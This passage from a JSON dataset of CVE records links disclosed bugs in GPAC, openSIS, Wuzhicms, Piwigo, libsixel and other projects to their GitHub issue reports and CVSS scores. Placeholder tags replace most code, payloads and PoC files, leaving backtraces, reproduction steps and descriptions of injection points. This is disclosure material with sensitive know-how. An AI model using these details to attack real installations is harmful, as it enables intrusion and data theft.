        "Issue_Created_At": "2021-08-24T11:14:59Z",
        "description": "Segmentation fault using mp4box in gf_odf_size_descriptor, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG e8 in gf_odf_size_descriptor (desc NUMBERTAG e NUMBERTAG a0, APITAG at PATHTAG NUMBERTAG aeaaee in gf_odf_size_dcd (dcd NUMBERTAG fffffff6ae0, APITAG at PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG in gf_odf_size_descriptor APITAG APITAG at PATHTAG NUMBERTAG aeade9 in gf_odf_write_dcd (bs NUMBERTAG a NUMBERTAG dcd NUMBERTAG fffffff6ae0) at PATHTAG NUMBERTAG a NUMBERTAG bd in gf_odf_write_descriptor (bs=bs APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG in gf_odf_desc_write_bs APITAG bs=bs APITAG at PATHTAG NUMBERTAG af NUMBERTAG b7 in gf_odf_desc_write APITAG APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG f6 in gf_odf_desc_copy APITAG APITAG at PATHTAG NUMBERTAG d2a3f in gf_isom_set_extraction_slc APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ce NUMBERTAG ff in gf_hinter_finalize (file=file APITAG APITAG out>, APITAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG APITAG max_ptime NUMBERTAG rtp_rate NUMBERTAG base_flags=<optimized out>, copy_data=GF_FALSE, interleave=GF_FALSE, regular_iod=GF_FALSE, single_group=GF_FALSE, hint_no_offset=GF_FALSE) at PATHTAG NUMBERTAG bd NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40569",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1890",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1890",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-25T05:36:34Z",
        "description": "Segmentation fault caused by double free using mp4box in gf_free, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ It seems that the pointer has been free previously in configfile.c ~~~~ APITAG ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40572",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1893",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1893",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-25T07:18:42Z",
        "description": "Segmentation fault caused by double free using mp4box in a NUMBERTAG dmx_finalize, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f2da NUMBERTAG in _int_free NUMBERTAG f NUMBERTAG af7 in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG e3d4d in a NUMBERTAG dmx_finalize (filter=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in gf_fs_del (fsess=fsess APITAG at PATHTAG NUMBERTAG c1a NUMBERTAG a in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40573",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1891",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1891",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-25T06:44:03Z",
        "description": "System abort caused by double free using mp4box. FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40576",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1904",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1904",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-31T12:13:57Z",
        "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_isom_get_payt_count, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG ab4f NUMBERTAG in gf_isom_get_payt_count APITAG APITAG at PATHTAG NUMBERTAG in APITAG (file=file APITAG APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG full_dump=GF_FALSE) at PATHTAG NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40592",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1876",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1876",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-16T09:08:59Z",
        "description": "Infinite Loop in APITAG Hi. There is an infinite loop bug in APITAG to reproduce, follow the command below with the attachment file. APITAG FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40606",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1885",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1885",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-24T02:45:45Z",
        "description": "Bug: Memcpy from unknown addrees. It's a memcpy from unknown addrees bug. Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code in bitstream.c: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40607",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1879",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1879",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-19T02:52:37Z",
        "description": "heap buffer overflow in schm_box_size. It's a heap buffer overflow bug caused by missing NUMBERTAG check of the end of URI. Step to reproduce NUMBERTAG get latest commit code APITAG GPAC version NUMBERTAG DEV re NUMBERTAG gbbd NUMBERTAG e master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40608",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1883",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1883",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-20T05:15:45Z",
        "description": "BUG : free on unknown addrees. It's a pointer free on unknown addrees bug caused by freeing a uninitialized pointer. Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: in APITAG CODETAG It is supposed to init t NUMBERTAG g in APITAG but in APITAG it might forget that mission. CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40610",
        "Issue_Url_old": "https://github.com/blackQvQ/emlog/issues/1",
        "Issue_Url_new": "https://github.com/blackqvq/emlog/issues/1",
        "Repo_new": "blackqvq/emlog",
        "Issue_Created_At": "2021-09-01T07:31:56Z",
        "description": "emlog pro NUMBERTAG management XSS Vulnerability. \u5728\u540e\u53f0\u7ba1\u7406\u7684\u5199\u6587\u7ae0\u6709\u4e24\u4e2a\u53ef\u5199\u5165xss \u6587\u7ae0\u6807\u9898 FILETAG \u9700\u8981\u8bc4\u8bba\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u4e00\u4e2a\u5728\u524d\u53f0\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u7cfb\u7edf\u8bbe\u7f6e\u7684\u9996\u9875\u4f4e\u90e8\u4fe1\u606f FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-40616",
        "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/722",
        "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/722",
        "Repo_new": "thinkcmf/thinkcmf",
        "Issue_Created_At": "2021-09-01T09:17:18Z",
        "description": "thinkcmf NUMBERTAG unauthorized vulnerability. thinkcmf NUMBERTAG found an unauthorized vulnerability. The attacker can modify the password of the administrator account with id NUMBERTAG through the background user management group permissions. The use condition is that the background user management group authority is required. By default, the password of the administrator account with id NUMBERTAG cannot be modified. Vulnerable PATHTAG FILETAG Browser access PATHTAG the password of the administrator account with id NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40617",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/192",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/192",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-01T12:17:31Z",
        "description": "SQL Injection in APITAG . Hi MENTIONTAG , I found a sql injection vulnerability in APITAG function. I can inject special character in URL to escape SQL query in backend because of lacking of sanitize user input. APITAG APITAG Bug: ERRORTAG In line NUMBERTAG the code does not sanitize param u , in order that, I can escape the SQL query easily. Solution: Use function APITAG before assign APITAG to username param. The code look like: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40618",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/193",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/193",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-01T12:48:52Z",
        "description": "SQL Injection in file FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data, attacker can injection malicious sql into query by control parameters such as APITAG , APITAG or APITAG , APITAG in file APITAG . Request ERRORTAG Response CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40635",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/195",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/195",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-01T15:52:40Z",
        "description": "SQL Injection in id Parameter. Author: CP0 ERRORTAG NUMBERTAG K from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Due to no security mechanism was implemented in parameter id , attacker can inject arbitrary SQL query and extract database informations FILETAG Vulnerable code section FILETAG FILETAG FILETAG FILETAG Request and Response APITAG GET APITAG + &table_name=courses HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate X Requested With: APITAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html course_modal_request|| APITAG NUMBERTAG courses were found. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Reading APITAG APITAG APITAG APITAG APITAG APITAG Writing APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40636",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/198",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/198",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-05T08:05:52Z",
        "description": "XSS and Error based SQL injection in FILETAG . Due to lack of protection, parameters APITAG , APITAG , id , APITAG can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter msg can be used to inject XSS payload and steal user's cookie (and even takeover user's account) FILETAG As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities. Exploiting FILETAG Injection point : APITAG In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in APITAG , msg . Request: APITAG GET APITAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Encoding: gzip Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/htmlx APITAG Solution Add security functions such as APITAG to sanitize parameters before processing or printing out to the screen. For XSS, use htmlentities to properly encode the output.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40637",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/199",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/199",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-05T10:01:03Z",
        "description": "Reflected XSS in FILETAG . Description By injecting Javascript code, an attacker can steal the user's cookie and takeover the user's account. This happened because of the lack of security implementation for type parameter. Exploitation FILETAG Injection point: APITAG Request: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/html APITAG Solution: Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using APITAG function to encode the user's input before printing it out to the user's screen",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40639",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/27",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/27",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2021-09-02T10:25:19Z",
        "description": "File reading. You can read any file in the web directory, including the database configuration file And all files in the root directory poc: FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40656",
        "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/25",
        "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/25",
        "Repo_new": "libsixel/libsixel",
        "Issue_Created_At": "2021-09-03T03:34:45Z",
        "description": "heap buffer overflow in PATHTAG Hi,I found a heap buffer overflow in the current master NUMBERTAG d NUMBERTAG URLTAG It sames with the PATHTAG NUMBERTAG URLTAG (I found this problem NUMBERTAG days ago) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: APITAG and here is the ASAN report for saitoha/libsixel URLTAG (the current master FILETAG In this position,[r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG So,writing to data will cause overflow and then it writes to a location (chunk) in the heap that should not be written to. heap info: Before: CODETAG After: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40660",
        "Issue_Url_old": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
        "Issue_Url_new": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
        "Repo_new": "javadelight/delight-nashorn-sandbox",
        "Issue_Created_At": "2021-08-30T01:48:26Z",
        "description": "A APITAG vulnerability can be exploited after version NUMBERTAG There is a weak expression can be exploited to launch a DOS attack. FILETAG Execution stack is as follow: FILETAG POC: FILETAG Run result: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40663",
        "Issue_Url_old": "https://github.com/janbialostok/deep-assign/issues/1",
        "Issue_Url_new": "https://github.com/janbialostok/deep-assign/issues/1",
        "Repo_new": "janbialostok/deep-assign",
        "Issue_Created_At": "2021-09-06T04:52:21Z",
        "description": "Prototype Pollution in APITAG npm package. \u270d\ufe0f Description APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG Proof of Concept LIVE POC LINK URLTAG CODETAG \ud83d\udca5 Impact May lead to Information PATHTAG External References for similar vulnerabilities/blogs: URLTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40669",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/196",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/196",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2021-09-05T14:05:26Z",
        "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: APITAG ERRORTAG The APITAG parameter is controllable and the direct filtering of the APITAG parameter is not rigorous. POC ERRORTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40670",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/197",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/197",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2021-09-06T02:43:30Z",
        "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter under the listing method are controllable, and the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40674",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/198",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/198",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2021-09-06T13:00:49Z",
        "description": "There are NUMBERTAG SQL injections in Wuzhicms NUMBERTAG background. There are NUMBERTAG SQL injections in Wuzhicms NUMBERTAG background one Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG two The second SQL injection and the first SQL injection are in a different function in the same file! Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG Set APITAG and APITAG to be controllable. the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG three Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Someone has submitted a SQL injection vulnerability in the file APITAG before ( URLTAG but I found that in addition to the APITAG parameter, it can be injected In addition, the APITAG parameter can also be injected! Vulnerability file: APITAG ERRORTAG Set APITAG NUMBERTAG and APITAG to be controllable. the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40678",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1476",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1476",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-09-06T02:58:29Z",
        "description": "Persistent Cross Site Scripting in Batch APITAG Description: In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross site scripting Vulnerable Instances: APITAG request ERRORTAG FILETAG suggestion Restrict user input and output",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-40812",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/750",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/750",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2021-09-05T05:18:46Z",
